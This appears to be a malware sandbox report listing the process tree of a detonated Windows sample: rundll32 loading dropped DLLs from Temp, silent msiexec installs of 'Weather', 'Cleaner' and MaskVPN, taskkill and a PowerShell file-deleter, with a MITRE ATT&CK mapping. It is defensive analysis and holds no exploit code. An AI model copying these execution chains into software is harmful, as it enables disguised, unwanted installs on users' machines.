rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6736
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:6756

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:6308

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:7160

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:1212

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7668

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4044

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:612
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 621978EE541C9B3D0E255E47BA77B887 C
  2⤵
  - Loads dropped DLL
  PID:5732
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 6CB297C9115D3EEB14368414E7E6DF18
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:3936
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:4164
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding B39F1DCFE1DD3CF80659711BE21FB7F9 E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:6092
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 9BA1BDE30161441D540B8D897F91E9A5 C
  2⤵
  PID:5508
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 4A5A10ACE3BAF5314BF9155868CC9251
  2⤵
  PID:2760
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:5844
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 2ED4CBB6D3A04493A7FB037E284BE3B7 E Global\MSI0000
  2⤵
  PID:6392
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 5A50B0147D6A578E05DB31AA8CD038A2 C
  2⤵
  PID:2296
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 16F4BFB01F2BE86CE1607F96D6434FC5
  2⤵
  PID:7612
- C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
  "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
  2⤵
  PID:2764
- - C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default
    3⤵
    PID:7364
  - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--CLacDmV"
      4⤵
      PID:4624
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1d0,0x1cc,0x1c8,0x1d4,0x1c4,0x7ff846f29ec0,0x7ff846f29ed0,0x7ff846f29ee0
        5⤵
        
        PID:6428
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1728,17843673762796175493,14745860993580375185,131072 --lang=ja --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4624_225804706" --mojo-platform-channel-handle=1860 /prefetch:8
        5⤵
        
        PID:8064
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1728,17843673762796175493,14745860993580375185,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4624_225804706" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1796 /prefetch:2
        5⤵
        
        PID:8104
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1728,17843673762796175493,14745860993580375185,131072 --lang=ja --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4624_225804706" --mojo-platform-channel-handle=2256 /prefetch:8
        5⤵
        
        PID:5300
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1728,17843673762796175493,14745860993580375185,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4624_225804706" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2680 /prefetch:1
        5⤵
        
        PID:6812
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,17843673762796175493,14745860993580375185,131072 --lang=ja --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4624_225804706" --mojo-platform-channel-handle=3260 /prefetch:8
        5⤵
        
        PID:364
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1728,17843673762796175493,14745860993580375185,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4624_225804706" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3372 /prefetch:2
        5⤵
        
        PID:6160
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,17843673762796175493,14745860993580375185,131072 --lang=ja --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4624_225804706" --mojo-platform-channel-handle=3600 /prefetch:8
        5⤵
        
        PID:1220
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,17843673762796175493,14745860993580375185,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4624_225804706" --mojo-platform-channel-handle=2920 /prefetch:8
        5⤵
        
        PID:6160
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,17843673762796175493,14745860993580375185,131072 --lang=ja --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4624_225804706" --mojo-platform-channel-handle=2748 /prefetch:8
        5⤵
        
        PID:5456
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,17843673762796175493,14745860993580375185,131072 --lang=ja --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4624_225804706" --mojo-platform-channel-handle=2152 /prefetch:8
        5⤵
        
        PID:7020
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_FAE.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"
    3⤵
    PID:1924
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 48312F81EE37B9A85C6DDC1029A9E2B1 C
  2⤵
  PID:7704
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 7344401F2E57FEF98F5141BB9B098F24
  2⤵
  PID:7308
- C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
  2⤵
  PID:6408
- - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
    3⤵
    PID:4572

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:8076
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  - Modifies registry class
  PID:1772

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:7444

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6480

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:7404
- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  PID:7492

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:8036

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5848

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7520

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5552

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6328

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:5436
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{2954247b-2be0-4d43-9665-064446ba9768}\oemvista.inf" "9" "4d14a44ff" "0000000000000164" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:4056
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"
  2⤵
  PID:6724

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:4024

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:4832

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:4800
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:8028

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5104

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5416

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update
1⤵
PID:1368

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

File and Directory Permissions Modification

T1222

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Software Discovery

T1518

System Information Discovery